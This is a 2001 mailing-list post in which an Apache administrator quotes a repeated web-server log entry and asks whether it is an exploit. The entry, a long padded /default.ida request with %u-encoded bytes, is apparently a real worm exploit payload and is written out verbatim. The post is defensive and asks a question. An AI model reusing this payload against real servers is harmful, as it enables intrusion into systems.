[plug] Apache Exploit?
Bernard Blackham
bernard at blackham.com.au
Sat Aug 4 00:55:05 WST 2001
List,
Every now and again I've been getting requests on my web server that look
like:
xxx.xxx.xxx.xxx - - [03/Aug/2001:23:42:35 +0800] "GET
/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9
090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0
078%u0000%u00=aHTTP/1.0" 404 205
I've had that exact string about 20 times in the past 2 months from a
number of IPs. I'm guessing it's an exploit of some sort someone's trying
out? Should I be concerned? Running Apache 1.3.6.
Regards
Bernard.
--
Bernard Blackham
bernard at blackham.com.au
More information about the plug
mailing list